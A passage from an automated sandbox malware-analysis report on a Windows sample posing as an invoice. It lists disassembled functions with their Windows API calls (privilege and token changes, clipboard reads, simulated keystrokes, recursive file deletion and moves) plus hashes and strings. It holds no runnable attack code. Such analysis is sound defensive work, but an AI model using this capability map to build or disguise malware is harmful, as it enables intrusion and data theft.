                                                              • GetForegroundWindow.USER32(00000000,00000000), ref: 0020EB4A
                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00263AEA
                                                              • IsIconic.USER32(000000FF), ref: 00263AF3
                                                              • ShowWindow.USER32(000000FF,00000009), ref: 00263B00
                                                              • SetForegroundWindow.USER32(000000FF), ref: 00263B0A
                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00263B20
                                                              • GetCurrentThreadId.KERNEL32 ref: 00263B27
                                                              • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00263B33
                                                              • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00263B44
                                                              • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00263B4C
                                                              • AttachThreadInput.USER32(00000000,?,00000001), ref: 00263B54
                                                              • SetForegroundWindow.USER32(000000FF), ref: 00263B57
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00263B6C
                                                              • keybd_event.USER32(00000012,00000000), ref: 00263B77
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00263B81
                                                              • keybd_event.USER32(00000012,00000000), ref: 00263B86
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00263B8F
                                                              • keybd_event.USER32(00000012,00000000), ref: 00263B94
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00263B9E
                                                              • keybd_event.USER32(00000012,00000000), ref: 00263BA3
                                                              • SetForegroundWindow.USER32(000000FF), ref: 00263BA6
                                                              • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00263BCD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                              • String ID: Shell_TrayWnd
                                                              • API String ID: 4125248594-2988720461
                                                              • Opcode ID: e9b9038596291c92efde3d30ab7dbd073a8c4c6ed8446b89a2696e5e276812be
                                                              • Instruction ID: 01b9da0b3539b5755c0a4ff43bdb2d9353d74f1efba3ad89204f658767bdad80
                                                              • Opcode Fuzzy Hash: e9b9038596291c92efde3d30ab7dbd073a8c4c6ed8446b89a2696e5e276812be
                                                              • Instruction Fuzzy Hash: 7F319471A50318BBEB206FA5AC4DF7F7E7CEF44B54F104015FA09EA1D0DAB15D90AAA0
                                                              Function 0022ACC5 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 223COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0022B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0022B180
                                                                • Part of subcall function 0022B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0022B1AD
                                                                • Part of subcall function 0022B134: GetLastError.KERNEL32 ref: 0022B1BA
                                                              • _memset.LIBCMT ref: 0022AD08
                                                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0022AD5A
                                                              • CloseHandle.KERNEL32(?), ref: 0022AD6B
                                                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0022AD82
                                                              • GetProcessWindowStation.USER32 ref: 0022AD9B
                                                              • SetProcessWindowStation.USER32(00000000), ref: 0022ADA5
                                                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0022ADBF
                                                                • Part of subcall function 0022AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0022ACC0), ref: 0022AB99
                                                                • Part of subcall function 0022AB84: CloseHandle.KERNEL32(?,?,0022ACC0), ref: 0022ABAB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                              • String ID: $H**$default$winsta0
                                                              • API String ID: 2063423040-1330500095
                                                              • Opcode ID: 42f6e81cbe0ff48a2d107ff0cae415391ee8223ed804f9da5a6135bc4ecf925e
                                                              • Instruction ID: 8c719c6448f5330055e11c4e23d9c5aeb2f34e93455fbb6dae73dbb72d79a247
                                                              • Opcode Fuzzy Hash: 42f6e81cbe0ff48a2d107ff0cae415391ee8223ed804f9da5a6135bc4ecf925e
                                                              • Instruction Fuzzy Hash: 0F819F7181021ABFDF119FE4EC49AEEBB78EF04304F044129F814A6561DB758E65DF61
                                                              Function 002360DD Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 174filestringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00236EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00235FA6,?), ref: 00236ED8
                                                                • Part of subcall function 00236EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00235FA6,?), ref: 00236EF1
                                                                • Part of subcall function 0023725E: __wsplitpath.LIBCMT ref: 0023727B
                                                                • Part of subcall function 0023725E: __wsplitpath.LIBCMT ref: 0023728E
                                                                • Part of subcall function 002372CB: GetFileAttributesW.KERNEL32(?,00236019), ref: 002372CC
                                                              • _wcscat.LIBCMT ref: 00236149
                                                              • _wcscat.LIBCMT ref: 00236167
                                                              • __wsplitpath.LIBCMT ref: 0023618E
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 002361A4
                                                              • _wcscpy.LIBCMT ref: 00236209
                                                              • _wcscat.LIBCMT ref: 0023621C
                                                              • _wcscat.LIBCMT ref: 0023622F
                                                              • lstrcmpiW.KERNEL32(?,?), ref: 0023625D
                                                              • DeleteFileW.KERNEL32(?), ref: 0023626E
                                                              • MoveFileW.KERNEL32(?,?), ref: 00236289
                                                              • MoveFileW.KERNEL32(?,?), ref: 00236298
                                                              • CopyFileW.KERNEL32(?,?,00000000), ref: 002362AD
                                                              • DeleteFileW.KERNEL32(?), ref: 002362BE
                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 002362E1
                                                              • FindClose.KERNEL32(00000000), ref: 002362FD
                                                              • FindClose.KERNEL32(00000000), ref: 0023630B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                              • String ID: \*.*$p1#v`K$v
                                                              • API String ID: 1917200108-1732502266
                                                              • Opcode ID: 73e01fd73497e1907361ff1923b04a684bd03752897131181dd211d119596ba2
                                                              • Instruction ID: e1aab99735e2d852b1af228fa2b7d216270723b1f0592795062cd00f073581ad
                                                              • Opcode Fuzzy Hash: 73e01fd73497e1907361ff1923b04a684bd03752897131181dd211d119596ba2
                                                              • Instruction Fuzzy Hash: 3A5140B281811D6ACB21EB91DC48DEFB7FCAF15300F0541E6E589E3101DE7697998FA4
                                                              Function 00246B0C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • OpenClipboard.USER32(0028DC00), ref: 00246B36
                                                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 00246B44
                                                              • GetClipboardData.USER32(0000000D), ref: 00246B4C
                                                              • CloseClipboard.USER32 ref: 00246B58
                                                              • GlobalLock.KERNEL32(00000000), ref: 00246B74
                                                              • CloseClipboard.USER32 ref: 00246B7E
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00246B93
                                                              • IsClipboardFormatAvailable.USER32(00000001), ref: 00246BA0
                                                              • GetClipboardData.USER32(00000001), ref: 00246BA8
                                                              • GlobalLock.KERNEL32(00000000), ref: 00246BB5
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00246BE9
                                                              • CloseClipboard.USER32 ref: 00246CF6
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                              • String ID:
                                                              • API String ID: 3222323430-0
                                                              • Opcode ID: c289147291d68441c495c76d601669464b514b9877a7a501a9ca26274f5c9d71
                                                              • Instruction ID: 3073f7dedec14a67db2ae2d3366d097f47cbaee168e1905ac6fea9a6f835e6b5
                                                              • Opcode Fuzzy Hash: c289147291d68441c495c76d601669464b514b9877a7a501a9ca26274f5c9d71
                                                              • Instruction Fuzzy Hash: 7F51AF71210206ABD304EF60ED9EF7E77B8EF55B11F10052AFA4AE61E1DF70D8458A62
                                                              Function 0023F5FA Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0023F62B
                                                              • FindClose.KERNEL32(00000000), ref: 0023F67F
                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0023F6A4
                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0023F6BB
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0023F6E2
                                                              • __swprintf.LIBCMT ref: 0023F72E
                                                              • __swprintf.LIBCMT ref: 0023F767
                                                              • __swprintf.LIBCMT ref: 0023F7BB
                                                                • Part of subcall function 0021172B: __woutput_l.LIBCMT ref: 00211784
                                                              • __swprintf.LIBCMT ref: 0023F809
                                                              • __swprintf.LIBCMT ref: 0023F858
                                                              • __swprintf.LIBCMT ref: 0023F8A7
                                                              • __swprintf.LIBCMT ref: 0023F8F6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                              • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                              • API String ID: 835046349-2428617273
                                                              • Opcode ID: daa2f998d2c2e1fef76f27058a029c62a417284b28f4df12be5ec07cf26eef6f
                                                              • Instruction ID: f25a563568714917222c02294682ae8b4be7b844912b46b916bb51e64edc6d08
                                                              • Opcode Fuzzy Hash: daa2f998d2c2e1fef76f27058a029c62a417284b28f4df12be5ec07cf26eef6f
                                                              • Instruction Fuzzy Hash: 23A111B1418344ABC354EF94C986DBFB7ECAF94704F44082EF695C2192EB34D959CB62
                                                              Function 00241B2F Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00241B50
                                                              • _wcscmp.LIBCMT ref: 00241B65
                                                              • _wcscmp.LIBCMT ref: 00241B7C
                                                              • GetFileAttributesW.KERNEL32(?), ref: 00241B8E
                                                              • SetFileAttributesW.KERNEL32(?,?), ref: 00241BA8
                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00241BC0
                                                              • FindClose.KERNEL32(00000000), ref: 00241BCB
                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00241BE7
                                                              • _wcscmp.LIBCMT ref: 00241C0E
                                                              • _wcscmp.LIBCMT ref: 00241C25
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00241C37
                                                              • SetCurrentDirectoryW.KERNEL32(002A39FC), ref: 00241C55
                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00241C5F
                                                              • FindClose.KERNEL32(00000000), ref: 00241C6C
                                                              • FindClose.KERNEL32(00000000), ref: 00241C7C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                              • String ID: *.*
                                                              • API String ID: 1803514871-438819550
                                                              • Opcode ID: 512ad339562f658a802ddb639a97edb90e270e8e0a829746df2518d1453168f3
                                                              • Instruction ID: ca9797c58facdfc2fe0c870b646b05a3eadec505126cf7687eb26f81880b7fd8
                                                              • Opcode Fuzzy Hash: 512ad339562f658a802ddb639a97edb90e270e8e0a829746df2518d1453168f3
                                                              • Instruction Fuzzy Hash: 9431C33255121A6BCB18AFB0EC89ADE77AC9F06324F500156F915E2091EB70DAF58A64
                                                              Function 00241C8A Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00241CAB
                                                              • _wcscmp.LIBCMT ref: 00241CC0
                                                              • _wcscmp.LIBCMT ref: 00241CD7
                                                                • Part of subcall function 00236BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00236BEF
                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00241D06
                                                              • FindClose.KERNEL32(00000000), ref: 00241D11
                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00241D2D
                                                              • _wcscmp.LIBCMT ref: 00241D54
                                                              • _wcscmp.LIBCMT ref: 00241D6B
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00241D7D
                                                              • SetCurrentDirectoryW.KERNEL32(002A39FC), ref: 00241D9B
                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00241DA5
                                                              • FindClose.KERNEL32(00000000), ref: 00241DB2
                                                              • FindClose.KERNEL32(00000000), ref: 00241DC2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                              • String ID: *.*
                                                              • API String ID: 1824444939-438819550
                                                              • Opcode ID: 16fb477a5a2e5a0b26be68c982ab0ee30ee9f0c04c17d15798e5407fcaf6be79
                                                              • Instruction ID: a8acca983d8487fe27a8ebd25b8507f1a7d4016ef91bc29734db1d9103129403
                                                              • Opcode Fuzzy Hash: 16fb477a5a2e5a0b26be68c982ab0ee30ee9f0c04c17d15798e5407fcaf6be79
                                                              • Instruction Fuzzy Hash: 1631E37291161ABBCF18AFA0EC49ADE77AD9F06320F100552E905A2091DB70DAF58E60
                                                              Function 001F7D19 Relevance: 23.7, APIs: 2, Strings: 11, Instructions: 962COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: _memset
                                                              • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                                                              • API String ID: 2102423945-2023335898
                                                              • Opcode ID: 09a01e955ba040c71d6415c44900ab7148da7a5bcd2110b53f2ae7e8512ca5f2
                                                              • Instruction ID: 1fc7544c59b06facea31bec0d335fd490d6898c61cd4955e08fc5aa6db054ab2
                                                              • Opcode Fuzzy Hash: 09a01e955ba040c71d6415c44900ab7148da7a5bcd2110b53f2ae7e8512ca5f2
                                                              • Instruction Fuzzy Hash: 8A82C271D1421ACBCF28CF98C9807BDBBB1BF48314F25816AD919AB391E7709D95CB90
                                                              Function 0024091D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLocalTime.KERNEL32(?), ref: 002409DF
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 002409EF
                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 002409FB
                                                              • __wsplitpath.LIBCMT ref: 00240A59
                                                              • _wcscat.LIBCMT ref: 00240A71
                                                              • _wcscat.LIBCMT ref: 00240A83
                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00240A98
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00240AAC
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00240ADE
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00240AFF
                                                              • _wcscpy.LIBCMT ref: 00240B0B
                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00240B4A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                              • String ID: *.*
                                                              • API String ID: 3566783562-438819550
                                                              • Opcode ID: 86d33da3d444ea278cc051cf2fe5bc6275e7ca8bd49fefd58e41cc8f9bcbbe8d
                                                              • Instruction ID: 02a34cf77fcd3018a8658453fe5a402764752ae5483708ffe38479254f954d90
                                                              • Opcode Fuzzy Hash: 86d33da3d444ea278cc051cf2fe5bc6275e7ca8bd49fefd58e41cc8f9bcbbe8d
                                                              • Instruction Fuzzy Hash: 8A618BB21143059FD714EF60C8859AEB3E8FF99314F04891AFA89C7252DB31E995CF92
                                                              Function 0022A66C Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0022ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0022ABD7
                                                                • Part of subcall function 0022ABBB: GetLastError.KERNEL32(?,0022A69F,?,?,?), ref: 0022ABE1
                                                                • Part of subcall function 0022ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0022A69F,?,?,?), ref: 0022ABF0
                                                                • Part of subcall function 0022ABBB: HeapAlloc.KERNEL32(00000000,?,0022A69F,?,?,?), ref: 0022ABF7
                                                                • Part of subcall function 0022ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0022AC0E
                                                                • Part of subcall function 0022AC56: GetProcessHeap.KERNEL32(00000008,0022A6B5,00000000,00000000,?,0022A6B5,?), ref: 0022AC62
                                                                • Part of subcall function 0022AC56: HeapAlloc.KERNEL32(00000000,?,0022A6B5,?), ref: 0022AC69
                                                                • Part of subcall function 0022AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0022A6B5,?), ref: 0022AC7A
                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0022A6D0
                                                              • _memset.LIBCMT ref: 0022A6E5
                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0022A704
                                                              • GetLengthSid.ADVAPI32(?), ref: 0022A715
                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 0022A752
                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0022A76E
                                                              • GetLengthSid.ADVAPI32(?), ref: 0022A78B
                                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0022A79A
                                                              • HeapAlloc.KERNEL32(00000000), ref: 0022A7A1
                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0022A7C2
                                                              • CopySid.ADVAPI32(00000000), ref: 0022A7C9
                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0022A7FA
                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0022A820
                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0022A834
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                              • String ID:
                                                              • API String ID: 3996160137-0
                                                              • Opcode ID: be460a29100b4ff9cabb67a012d96365882934e9981065ba824c4a8037a429e4
                                                              • Instruction ID: 06d03044ae3f06f8dc02d08cfc6f654a5baa711b090787eaa026f7ac50e290b5
                                                              • Opcode Fuzzy Hash: be460a29100b4ff9cabb67a012d96365882934e9981065ba824c4a8037a429e4
                                                              • Instruction Fuzzy Hash: AC51497191021ABFDF009FA4EC49EEEBBB9FF04300F048129F915A6690DB349A56CB61
                                                              Function 001F6F07 Relevance: 20.9, Strings: 16, Instructions: 883COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: )$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$))) )
                                                              • API String ID: 0-83473947
                                                              • Opcode ID: aa3d7c42e348636e235e587fa45ff5831220b433dab30c2555223bd0f3da3995
                                                              • Instruction ID: d99921f1914f801816e32b6e71e0d3749142e849ab3f80af99c251a0ab8f501c
                                                              • Opcode Fuzzy Hash: aa3d7c42e348636e235e587fa45ff5831220b433dab30c2555223bd0f3da3995
                                                              • Instruction Fuzzy Hash: FF727F71E1421ADBDF24CF58D8807BEB7B5BF58310F14816AE909EB280DB709E95DB90
                                                              Function 002363F9 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 89fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00236EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00235FA6,?), ref: 00236ED8
                                                                • Part of subcall function 002372CB: GetFileAttributesW.KERNEL32(?,00236019), ref: 002372CC
                                                              • _wcscat.LIBCMT ref: 00236441
                                                              • __wsplitpath.LIBCMT ref: 0023645F
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00236474
